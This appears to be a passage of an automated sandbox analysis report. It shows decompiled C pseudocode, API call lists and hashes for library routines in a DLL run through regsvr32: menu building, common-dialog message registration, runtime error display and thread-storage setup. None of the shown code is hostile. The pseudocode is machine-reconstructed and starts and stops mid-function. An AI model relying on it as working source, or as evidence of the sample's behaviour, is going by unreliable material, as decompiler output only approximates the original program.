                                                                                                            												wsprintfA( &_v32, ??, "%d ", _t132);
                                                                                                            												L38:
                                                                                                            												_t230 = _t230 + 0xc;
                                                                                                            											}
                                                                                                            											_push( &_v32);
                                                                                                            											_t136 = E10006B11( &_v312, __eflags);
                                                                                                            											_push( &_v296);
                                                                                                            											_push(_t136);
                                                                                                            											_push( &_v316);
                                                                                                            											_v8 = 2;
                                                                                                            											_t138 = E10024DC7( &_v296, __eflags);
                                                                                                            											_t216 =  *(_t224 + 8);
                                                                                                            											_t203 =  *(_t224 + 4);
                                                                                                            											_t77 = _t216 + 1; // 0x1
                                                                                                            											 *(_t224 + 8) = _t77;
                                                                                                            											_t79 = _t203 + 1; // 0x3
                                                                                                            											_t230 = _t230 + 0xc;
                                                                                                            											 *(_t224 + 4) = _t79;
                                                                                                            											_v304 =  *_t138;
                                                                                                            											InsertMenuA( *( *(_t224 + 0xc) + 4),  *(_t224 + 8), 0x400,  *(_t224 + 4), _v304);
                                                                                                            											E100014B0(_v316 + 0xfffffff0,  *(_t224 + 8));
                                                                                                            											_v8 = 1;
                                                                                                            											E100014B0(_v312 + 0xfffffff0,  *(_t224 + 8));
                                                                                                            											_a4 = _a4 + 1;
                                                                                                            											__eflags = _a4 -  *(_t220 + 4);
                                                                                                            											if(_a4 <  *(_t220 + 4)) {
                                                                                                            												_t176 = _v308;
                                                                                                            												continue;
                                                                                                            											}
                                                                                                            											goto L40;
                                                                                                            										}
                                                                                                            									}
                                                                                                            									L40:
                                                                                                            									 *(_t224 + 8) =  *(_t224 + 8) - 1;
                                                                                                            									 *((intOrPtr*)(_t224 + 0x20)) = GetMenuItemCount( *( *(_t224 + 0xc) + 4));
                                                                                                            									 *((intOrPtr*)(_t224 + 0x18)) = 1;
                                                                                                            									E100014B0(_v296 + 0xfffffff0, _t216);
                                                                                                            									__eflags = _v300 + 0xfffffff0;
                                                                                                            									_t110 = E100014B0(_v300 + 0xfffffff0, _t216);
                                                                                                            								}
                                                                                                            							}
                                                                                                            						}
                                                                                                            					} else {
                                                                                                            						_t180 =  *_t171;
                                                                                                            						__eflags =  *(_t180 - 0xc);
                                                                                                            						if( *(_t180 - 0xc) != 0) {
                                                                                                            							 *((intOrPtr*)( *_t224 + 0xc))(_t180);
                                                                                                            						}
                                                                                                            						_t110 =  *((intOrPtr*)( *_t224))(0);
                                                                                                            					}
                                                                                                            					 *[fs:0x0] = _v16;
                                                                                                            					return E100117AE(_t110, _v20);
                                                                                                            				} else {
                                                                                                            					_push(_a4);
                                                                                                            					_push( &_v268);
                                                                                                            					if(E1002592C(__ebx, _t219, __esi) == 0) {
                                                                                                            						goto L10;
                                                                                                            					} else {
                                                                                                            						_t226 = 0;
                                                                                                            						if( *((intOrPtr*)(_t219 + 4)) - 1 > 0) {
                                                                                                            							while(E1002535C(_t170, _t219, _t226,  *((intOrPtr*)( *((intOrPtr*)(_t219 + 8)) + _t226 * 4)),  &_v268) == 0) {
                                                                                                            								_t226 = _t226 + 1;
                                                                                                            								if(_t226 <  *((intOrPtr*)(_t219 + 4)) - 1) {
                                                                                                            									continue;
                                                                                                            								} else {
                                                                                                            								}
                                                                                                            								L8:
                                                                                                            								while(_t226 > 0) {
                                                                                                            									E100074A5(_t170,  *((intOrPtr*)(_t219 + 8)) + _t226 * 4, _t228,  *((intOrPtr*)(_t219 + 8)) + _t226 * 4 - 4);
                                                                                                            									_t226 = _t226 - 1;
                                                                                                            									__eflags = _t226;
                                                                                                            								}
                                                                                                            								goto L9;
                                                                                                            							}
                                                                                                            							goto L8;
                                                                                                            						}
                                                                                                            						L9:
                                                                                                            						return E100117AE(E10006AEC( *((intOrPtr*)(_t219 + 8)),  &_v268), _v8);
                                                                                                            					}
                                                                                                            				}
                                                                                                            			}















































                                                                                                            0x10025095
                                                                                                            0x10025097
                                                                                                            0x1002509e
                                                                                                            0x1002509e
                                                                                                            0x10025097
                                                                                                            0x100250a6
                                                                                                            0x100250a8
                                                                                                            0x100250aa
                                                                                                            0x100250ad
                                                                                                            0x100250cb
                                                                                                            0x100250ce
                                                                                                            0x100250d4
                                                                                                            0x100250d6
                                                                                                            0x100250d9
                                                                                                            0x100250db
                                                                                                            0x100250e9
                                                                                                            0x100250ef
                                                                                                            0x100250f0
                                                                                                            0x100250f0
                                                                                                            0x100250db
                                                                                                            0x10025102
                                                                                                            0x10025108
                                                                                                            0x1002510a
                                                                                                            0x10025110
                                                                                                            0x10025112
                                                                                                            0x10025125
                                                                                                            0x10025127
                                                                                                            0x1002512f
                                                                                                            0x10025130
                                                                                                            0x10025136
                                                                                                            0x1002514d
                                                                                                            0x10025153
                                                                                                            0x10025157
                                                                                                            0x1002515c
                                                                                                            0x10025166
                                                                                                            0x1002516c
                                                                                                            0x10025170
                                                                                                            0x10025174
                                                                                                            0x10025178
                                                                                                            0x10025186
                                                                                                            0x1002519e
                                                                                                            0x100251a1
                                                                                                            0x100251a3
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100251a9
                                                                                                            0x100251bb
                                                                                                            0x100251e2
                                                                                                            0x100251e2
                                                                                                            0x100251e4
                                                                                                            0x100251e6
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100251c2
                                                                                                            0x100251c5
                                                                                                            0x100251c7
                                                                                                            0x100251c9
                                                                                                            0x100251c9
                                                                                                            0x100251c9
                                                                                                            0x100251ca
                                                                                                            0x100251cc
                                                                                                            0x100251cf
                                                                                                            0x100251d6
                                                                                                            0x100251d8
                                                                                                            0x100251da
                                                                                                            0x100251db
                                                                                                            0x100251db
                                                                                                            0x100251db
                                                                                                            0x100251de
                                                                                                            0x100251e0
                                                                                                            0x100251e1
                                                                                                            0x100251e1
                                                                                                            0x100251e1
                                                                                                            0x100251e8
                                                                                                            0x100251f2
                                                                                                            0x10025201
                                                                                                            0x10025204
                                                                                                            0x10025207
                                                                                                            0x10025211
                                                                                                            0x1002522e
                                                                                                            0x00000000
                                                                                                            0x10025213
                                                                                                            0x1002521c
                                                                                                            0x1002521c
                                                                                                            0x10025209
                                                                                                            0x1002522e
                                                                                                            0x1002522a
                                                                                                            0x10025234
                                                                                                            0x10025234
                                                                                                            0x1002523a
                                                                                                            0x10025241
                                                                                                            0x1002524c
                                                                                                            0x1002524d
                                                                                                            0x10025254
                                                                                                            0x10025255
                                                                                                            0x10025259
                                                                                                            0x1002525e
                                                                                                            0x10025261
                                                                                                            0x10025264
                                                                                                            0x10025267
                                                                                                            0x1002526a
                                                                                                            0x1002526d
                                                                                                            0x10025270
                                                                                                            0x10025275
                                                                                                            0x1002528e
                                                                                                            0x1002529d
                                                                                                            0x100252ab
                                                                                                            0x100252af
                                                                                                            0x100252b4
                                                                                                            0x100252ba
                                                                                                            0x100252bd
                                                                                                            0x10025180
                                                                                                            0x00000000
                                                                                                            0x10025180
                                                                                                            0x00000000
                                                                                                            0x100252bd
                                                                                                            0x10025186
                                                                                                            0x100252c3
                                                                                                            0x100252c6
                                                                                                            0x100252db
                                                                                                            0x100252de
                                                                                                            0x100252e5
                                                                                                            0x100252f0
                                                                                                            0x100252f3
                                                                                                            0x100252f3
                                                                                                            0x10025112
                                                                                                            0x1002510a
                                                                                                            0x100250af
                                                                                                            0x100250af
                                                                                                            0x100250b1
                                                                                                            0x100250b4
                                                                                                            0x100250bb
                                                                                                            0x100250bb
                                                                                                            0x100250c4
                                                                                                            0x100250c4
                                                                                                            0x100252fd
                                                                                                            0x1002530e
                                                                                                            0x10024fea
                                                                                                            0x10024fea
                                                                                                            0x10024ff3
                                                                                                            0x10024ffb
                                                                                                            0x00000000
                                                                                                            0x10024ffd
                                                                                                            0x10025000
                                                                                                            0x10025005
                                                                                                            0x10025007
                                                                                                            0x10025021
                                                                                                            0x10025025
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10025027
                                                                                                            0x00000000
                                                                                                            0x10025039
                                                                                                            0x10025033
                                                                                                            0x10025038
                                                                                                            0x10025038
                                                                                                            0x10025038
                                                                                                            0x00000000
                                                                                                            0x10025039
                                                                                                            0x00000000
                                                                                                            0x10025007
                                                                                                            0x1002503d
                                                                                                            0x10025057
                                                                                                            0x10025057
                                                                                                            0x10024ffb

                                                                                                            APIs
                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 10024FDD
                                                                                                            • __EH_prolog.LIBCMT ref: 1002506B
                                                                                                            • DeleteMenu.USER32(?,?,00000000), ref: 100250E9
                                                                                                            • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 10025102
                                                                                                            • lstrlenA.KERNEL32(?), ref: 1002511F
                                                                                                            • wsprintfA.USER32 ref: 1002522E
                                                                                                              • Part of subcall function 1002592C: __EH_prolog.LIBCMT ref: 10025931
                                                                                                              • Part of subcall function 1002592C: GetFullPathNameA.KERNEL32(?,00000104,?,?), ref: 1002595B
                                                                                                              • Part of subcall function 1002592C: lstrcpynA.KERNEL32(?,?,00000104), ref: 1002596C
                                                                                                            • lstrcpyA.KERNEL32(?,1&0 ,000000FF,?), ref: 1002521C
                                                                                                            • InsertMenuA.USER32(00000002,00000000,00000400,00000002,?), ref: 1002528E
                                                                                                            • GetMenuItemCount.USER32 ref: 100252CC
                                                                                                              • Part of subcall function 1002535C: lstrcmpiA.KERNEL32(?,00000000), ref: 10025375
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Menu$H_prologlstrlen$CountCurrentDeleteDirectoryFullInsertItemNamePathlstrcmpilstrcpylstrcpynwsprintf
                                                                                                            • String ID: %d $&%d $1&0 $\
                                                                                                            • API String ID: 342826643-2399880791
                                                                                                            • Opcode ID: e1eed6eaa5f1d35012eb48c82aef279fa05277b41a2bb3cefb7989940d9464f9
                                                                                                            • Instruction ID: 8aad9e791dd0b61d4e6d294f68b120ef5cdd25e9988c916dda0b03ab33557493
                                                                                                            • Opcode Fuzzy Hash: e1eed6eaa5f1d35012eb48c82aef279fa05277b41a2bb3cefb7989940d9464f9
                                                                                                            • Instruction Fuzzy Hash: 31B1BD34900215DFDB10CF64DC84FAAB7B4FF09345F508699E59A8B292DB31EA84CF94
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 92%
                                                                                                            			E1001D28C(struct HWND__* _a4, intOrPtr _a8, short _a12, signed int _a16) {
                                                                                                            				void* __ebp;
                                                                                                            				signed int _t31;
                                                                                                            				signed int _t33;
                                                                                                            				void* _t40;
                                                                                                            				int _t46;
                                                                                                            				intOrPtr _t64;
                                                                                                            				signed int* _t65;
                                                                                                            				void* _t67;
                                                                                                            				intOrPtr* _t69;
                                                                                                            
                                                                                                            				if(_a4 != 0) {
                                                                                                            					_push(0x100347fd);
                                                                                                            					_t53 = 0x1004efe8;
                                                                                                            					_t67 = E10037855(0x1004efe8);
                                                                                                            					__eflags =  *(_t67 + 0x18);
                                                                                                            					if( *(_t67 + 0x18) != 0) {
                                                                                                            						_push(_a4);
                                                                                                            						__eflags = E10022115();
                                                                                                            						if(__eflags == 0) {
                                                                                                            							_t53 =  *(_t67 + 0x18);
                                                                                                            							E10022DAA( *(_t67 + 0x18), __eflags, _a4);
                                                                                                            							 *(_t67 + 0x18) = 0;
                                                                                                            						}
                                                                                                            					}
                                                                                                            					_t64 = _a8;
                                                                                                            					__eflags = _t64 - 0x110;
                                                                                                            					if(_t64 != 0x110) {
                                                                                                            						__eflags = _t64 -  *0x1004f3b8; // 0x0
                                                                                                            						if(__eflags == 0) {
                                                                                                            							L22:
                                                                                                            							SendMessageA(_a4, 0x111, 0xe146, 0);
                                                                                                            							_t31 = 1;
                                                                                                            							__eflags = 1;
                                                                                                            							goto L23;
                                                                                                            						}
                                                                                                            						__eflags = _t64 - 0x111;
                                                                                                            						if(_t64 != 0x111) {
                                                                                                            							L10:
                                                                                                            							__eflags = _t64 - 0xc000;
                                                                                                            							if(_t64 >= 0xc000) {
                                                                                                            								_push(_a4);
                                                                                                            								_t69 = E10022115();
                                                                                                            								_t33 = E100244DE(_t69, 0x10040f58);
                                                                                                            								__eflags = _t33;
                                                                                                            								if(_t33 == 0) {
                                                                                                            									L14:
                                                                                                            									__eflags = _t64 -  *0x1004f3ac; // 0x0
                                                                                                            									if(__eflags != 0) {
                                                                                                            										__eflags = _t64 -  *0x1004f3b0; // 0x0
                                                                                                            										if(__eflags != 0) {
                                                                                                            											__eflags = _t64 -  *0x1004f3a8; // 0x0
                                                                                                            											if(__eflags != 0) {
                                                                                                            												__eflags = _t64 -  *0x1004f3b4; // 0x0
                                                                                                            												if(__eflags != 0) {
                                                                                                            													goto L11;
                                                                                                            												}
                                                                                                            												_t31 =  *((intOrPtr*)( *_t69 + 0x158))();
                                                                                                            												goto L23;
                                                                                                            											}
                                                                                                            											 *((intOrPtr*)( *_t69 + 0x160))(_a12, _a16 & 0x0000ffff, _a16 >> 0x10);
                                                                                                            											goto L11;
                                                                                                            										}
                                                                                                            										_t19 = _t69 + 0x1c0; // 0x1c0
                                                                                                            										_t65 = _t19;
                                                                                                            										 *_t65 = _a16;
                                                                                                            										_t31 =  *((intOrPtr*)( *_t69 + 0x15c))();
                                                                                                            										 *_t65 =  *_t65 & 0x00000000;
                                                                                                            										goto L23;
                                                                                                            									}
                                                                                                            									_t31 =  *((intOrPtr*)( *_t69 + 0x158))(_a16);
                                                                                                            									goto L23;
                                                                                                            								}
                                                                                                            								_t40 = E1001CE89(_t69);
                                                                                                            								__eflags =  *(_t40 + 0x36) & 0x00000008;
                                                                                                            								if(( *(_t40 + 0x36) & 0x00000008) != 0) {
                                                                                                            									goto L11;
                                                                                                            								}
                                                                                                            								goto L14;
                                                                                                            							}
                                                                                                            							L11:
                                                                                                            							_t31 = 0;
                                                                                                            							goto L23;
                                                                                                            						}
                                                                                                            						__eflags = _a12 - 0x40e;
                                                                                                            						if(_a12 == 0x40e) {
                                                                                                            							goto L22;
                                                                                                            						}
                                                                                                            						goto L10;
                                                                                                            					} else {
                                                                                                            						 *0x1004f3a8 = RegisterClipboardFormatA("commdlg_LBSelChangedNotify");
                                                                                                            						 *0x1004f3ac = RegisterClipboardFormatA("commdlg_ShareViolation");
                                                                                                            						 *0x1004f3b0 = RegisterClipboardFormatA("commdlg_FileNameOK");
                                                                                                            						 *0x1004f3b4 = RegisterClipboardFormatA("commdlg_ColorOK");
                                                                                                            						 *0x1004f3b8 = RegisterClipboardFormatA("commdlg_help");
                                                                                                            						_t46 = RegisterClipboardFormatA("commdlg_SetRGBColor");
                                                                                                            						_push(_a16);
                                                                                                            						 *0x1004f3bc = _t46;
                                                                                                            						_push(_a12);
                                                                                                            						_t31 = E1001EB68(_t53, _a4, 0x110);
                                                                                                            						L23:
                                                                                                            						return _t31;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				return 0;
                                                                                                            			}













                                                                                                            APIs
                                                                                                            • RegisterClipboardFormatA.USER32 ref: 1001D2E7
                                                                                                            • RegisterClipboardFormatA.USER32 ref: 1001D2F3
                                                                                                            • RegisterClipboardFormatA.USER32 ref: 1001D2FF
                                                                                                            • RegisterClipboardFormatA.USER32 ref: 1001D30B
                                                                                                            • RegisterClipboardFormatA.USER32 ref: 1001D317
                                                                                                            • RegisterClipboardFormatA.USER32 ref: 1001D323
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClipboardFormatRegister
                                                                                                            • String ID: commdlg_ColorOK$commdlg_FileNameOK$commdlg_LBSelChangedNotify$commdlg_SetRGBColor$commdlg_ShareViolation$commdlg_help
                                                                                                            • API String ID: 1228543026-3888057576
                                                                                                            • Opcode ID: 26a9f27f9cc4385a7a007a1bb79a9b34ea0bc551609e4be67ab91c335422c716
                                                                                                            • Instruction ID: 90b801e29acbd5a70dd584596d4e007027562c874008bfc0544b1ea411f40a0f
                                                                                                            • Opcode Fuzzy Hash: 26a9f27f9cc4385a7a007a1bb79a9b34ea0bc551609e4be67ab91c335422c716
                                                                                                            • Instruction Fuzzy Hash: E7418071A00265EFDB21FF25CC889AE3BE1EB44391B12442AF905DB251DB30EA91CB95
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 71%
                                                                                                            			E10016994() {
                                                                                                            				intOrPtr _t20;
                                                                                                            				int _t21;
                                                                                                            				long _t24;
                                                                                                            				void* _t31;
                                                                                                            				void* _t51;
                                                                                                            				long _t52;
                                                                                                            				void* _t57;
                                                                                                            				signed int _t67;
                                                                                                            				void** _t69;
                                                                                                            				void* _t70;
                                                                                                            				void* _t72;
                                                                                                            				void* _t73;
                                                                                                            
                                                                                                            				_t70 = _t72 - 0x8c;
                                                                                                            				_t73 = _t72 - 0x10c;
                                                                                                            				_t20 =  *0x1004c470; // 0xf3933a06
                                                                                                            				_t52 =  *(_t70 + 0x94);
                                                                                                            				 *((intOrPtr*)(_t70 + 0x88)) = _t20;
                                                                                                            				_t21 = 0;
                                                                                                            				while(_t52 !=  *((intOrPtr*)(0x1004cb88 + _t21 * 8))) {
                                                                                                            					_t21 = _t21 + 1;
                                                                                                            					if(_t21 < 0x13) {
                                                                                                            						continue;
                                                                                                            					}
                                                                                                            					break;
                                                                                                            				}
                                                                                                            				_t67 = _t21 << 3;
                                                                                                            				_t6 = _t67 + 0x1004cb88; // 0x28000000
                                                                                                            				if(_t52 ==  *_t6) {
                                                                                                            					_t21 =  *0x1004f3d4; // 0x0
                                                                                                            					if(_t21 == 1 || _t21 == 0 &&  *0x1004f3d8 == 1) {
                                                                                                            						_t17 = _t67 + 0x1004cb8c; // 0x10042328
                                                                                                            						_t69 = _t17;
                                                                                                            						_t24 = E10011820( *_t69);
                                                                                                            						_t21 = WriteFile(GetStdHandle(0xfffffff4),  *_t69, _t24, _t70 + 0x94, 0);
                                                                                                            					} else {
                                                                                                            						if(_t52 != 0xfc) {
                                                                                                            							 *((char*)(_t70 + 0x84)) = 0;
                                                                                                            							if(GetModuleFileNameA(0, _t70 - 0x80, 0x104) == 0) {
                                                                                                            								E10017B90(_t70 - 0x80, "<program name unknown>");
                                                                                                            							}
                                                                                                            							_t63 = _t70 - 0x80;
                                                                                                            							if(E10011820(_t70 - 0x80) + 1 > 0x3c) {
                                                                                                            								E10019E20(E10011820(_t63) + _t70 - 0x45, "...", 3);
                                                                                                            								_t73 = _t73 + 0x10;
                                                                                                            							}
                                                                                                            							_t31 = E10011820(_t63);
                                                                                                            							_t12 = _t67 + 0x1004cb8c; // 0x10042328
                                                                                                            							_t14 = E10011820( *_t12) + 0x1c; // 0x1c
                                                                                                            							_pop(_t57);
                                                                                                            							E10010B20(_t31 + _t14 + 0x00000003 & 0xfffffffc, _t57);
                                                                                                            							_t51 = _t73;
                                                                                                            							E10017B90(_t51, "Runtime Error!\n\nProgram: ");
                                                                                                            							E10017BA0(_t51, _t63);
                                                                                                            							E10017BA0(_t51, "\n\n");
                                                                                                            							_t15 = _t67 + 0x1004cb8c; // 0x10042328
                                                                                                            							E10017BA0(_t51,  *_t15);
                                                                                                            							_push(0x12010);
                                                                                                            							_push("Microsoft Visual C++ Runtime Library");
                                                                                                            							_push(_t51);
                                                                                                            							_t21 = E10019D1D();
                                                                                                            						}
                                                                                                            					}
                                                                                                            				}
                                                                                                            				return E100117AE(_t21,  *((intOrPtr*)(_t70 + 0x88)));
                                                                                                            			}
















                                                                                                            APIs
                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,00000000,00000000), ref: 10016A15
                                                                                                            • _strlen.LIBCMT ref: 10016A35
                                                                                                            • _strlen.LIBCMT ref: 10016A44
                                                                                                            • _strncpy.LIBCMT ref: 10016A5B
                                                                                                            • _strlen.LIBCMT ref: 10016A64
                                                                                                            • _strlen.LIBCMT ref: 10016A71
                                                                                                            • _strlen.LIBCMT ref: 10016AD7
                                                                                                            • GetStdHandle.KERNEL32(000000F4,10042328,00000000,?,00000000,00000000,00000000,00000000), ref: 10016AE2
                                                                                                            • WriteFile.KERNEL32(00000000), ref: 10016AE9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _strlen$File$HandleModuleNameWrite_strncpy
                                                                                                            • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                                            • API String ID: 190417973-4022980321
                                                                                                            • Opcode ID: d9df06dfbccc529ba4e4772b6333d36022795db3091ded2d1c9dd1f49d36b4f7
                                                                                                            • Instruction ID: a98b9a16bc0a3033c6b9ef3d9cc886c10ccef6c9644ec2f046cd71b0d49ba214
                                                                                                            • Opcode Fuzzy Hash: d9df06dfbccc529ba4e4772b6333d36022795db3091ded2d1c9dd1f49d36b4f7
                                                                                                            • Instruction Fuzzy Hash: 6331F4765002146BEB21EB74CCD6EAA37BDEF48250F10891AF545EB142EF34F9C98B64
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 70%
                                                                                                            			E10015384() {
                                                                                                            				void* __edi;
                                                                                                            				void* __esi;
                                                                                                            				intOrPtr _t7;
                                                                                                            				struct HINSTANCE__* _t9;
                                                                                                            				struct HINSTANCE__* _t11;
                                                                                                            				long _t12;
                                                                                                            				_Unknown_base(*)()* _t16;
                                                                                                            				void* _t22;
                                                                                                            				struct HINSTANCE__* _t26;
                                                                                                            				void* _t30;
                                                                                                            				struct HINSTANCE__* _t32;
                                                                                                            
                                                                                                            				if(E100138E5() != 0) {
                                                                                                            					_push(_t30);
                                                                                                            					_t26 = GetModuleHandleA("kernel32.dll");
                                                                                                            					__eflags = _t26;
                                                                                                            					if(_t26 != 0) {
                                                                                                            						_t30 = GetProcAddress;
                                                                                                            						 *0x1004f5dc = GetProcAddress(_t26, "FlsAlloc");
                                                                                                            						 *0x1004f5e0 = GetProcAddress(_t26, "FlsGetValue");
                                                                                                            						 *0x1004f5e4 = GetProcAddress(_t26, "FlsSetValue");
                                                                                                            						_t16 = GetProcAddress(_t26, "FlsFree");
                                                                                                            						__eflags =  *0x1004f5e0;
                                                                                                            						 *0x1004f5e8 = _t16;
                                                                                                            						if( *0x1004f5e0 == 0) {
                                                                                                            							 *0x1004f5e0 = TlsGetValue;
                                                                                                            							 *0x1004f5e4 = TlsSetValue;
                                                                                                            							 *0x1004f5dc = 0x10015164;
                                                                                                            							 *0x1004f5e8 = TlsFree;
                                                                                                            						}
                                                                                                            					}
                                                                                                            					_t7 =  *0x1004f5dc(E1001520E);
                                                                                                            					__eflags = _t7 - 0xffffffff;
                                                                                                            					 *0x1004c848 = _t7;
                                                                                                            					if(__eflags == 0) {
                                                                                                            						L9:
                                                                                                            						E1001516D();
                                                                                                            						_t9 = 0;
                                                                                                            						__eflags = 0;
                                                                                                            					} else {
                                                                                                            						_push(0x8c);
                                                                                                            						_push(1);
                                                                                                            						_t32 = E1001382A(_t22, 1, _t30, __eflags);
                                                                                                            						__eflags = _t32;
                                                                                                            						if(_t32 == 0) {
                                                                                                            							goto L9;
                                                                                                            						} else {
                                                                                                            							_t11 =  *0x1004f5e4( *0x1004c848, _t32);
                                                                                                            							__eflags = _t11;
                                                                                                            							if(_t11 == 0) {
                                                                                                            								goto L9;
                                                                                                            							} else {
                                                                                                            								 *((intOrPtr*)(_t32 + 0x54)) = 0x1004cb00;
                                                                                                            								 *((intOrPtr*)(_t32 + 0x14)) = 1;
                                                                                                            								_t12 = GetCurrentThreadId();
                                                                                                            								 *(_t32 + 4) =  *(_t32 + 4) | 0xffffffff;
                                                                                                            								 *_t32 = _t12;
                                                                                                            								_t9 = 1;
                                                                                                            							}
                                                                                                            						}
                                                                                                            					}
                                                                                                            					return _t9;
                                                                                                            				} else {
                                                                                                            					E1001516D();
                                                                                                            					return 0;
                                                                                                            				}
                                                                                                            			}















                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,00000000,?,10011225,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 1001539C
                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 100153B4
                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 100153C1
                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 100153CE
                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 100153DB
                                                                                                            • FlsAlloc.KERNEL32(Function_0001520E,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10015418
                                                                                                            • FlsSetValue.KERNEL32(00000000,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10015445
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 10015459
                                                                                                              • Part of subcall function 1001516D: FlsFree.KERNEL32(FFFFFFFF,100112B4,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10015178
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$AllocCurrentFreeHandleModuleThreadValue
                                                                                                            • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$kernel32.dll
                                                                                                            • API String ID: 2355849793-282957996
                                                                                                            • Opcode ID: 5857886783612fad9efa5a9e9f95e7b5ce1a3c64d21a81c760e3cc40ea27afcc
                                                                                                            • Instruction ID: 40006df79962a22775231557979cac449e3f6d5e877b76d204bcc213d6c27e9e
                                                                                                            • Opcode Fuzzy Hash: 5857886783612fad9efa5a9e9f95e7b5ce1a3c64d21a81c760e3cc40ea27afcc
                                                                                                            • Instruction Fuzzy Hash: D821CF78901A65DFE321CF7A9D88A673FE0EB42692718412EF910CF260EB71C480CF54
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 90%
                                                                                                            			E1002D2D6(intOrPtr* __ecx, void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                            				int _v8;
                                                                                                            				int _v12;
                                                                                                            				int _v16;
                                                                                                            				intOrPtr* _v20;
                                                                                                            				intOrPtr _v24;
                                                                                                            				char _v28;
                                                                                                            				signed int _v32;
                                                                                                            				signed int _v36;
                                                                                                            				intOrPtr _v40;
                                                                                                            				intOrPtr _v44;
                                                                                                            				int _v48;
                                                                                                            				void* _v52;
                                                                                                            				struct tagRECT _v68;
                                                                                                            				struct tagRECT _v84;
                                                                                                            				struct tagRECT _v100;
                                                                                                            				struct HDWP__* _v132;
                                                                                                            				void* __ebx;
                                                                                                            				void* __edi;
                                                                                                            				void* __esi;
                                                                                                            				void* __ebp;
                                                                                                            				intOrPtr _t188;
                                                                                                            				signed int _t190;
                                                                                                            				signed int _t192;
                                                                                                            				intOrPtr* _t198;
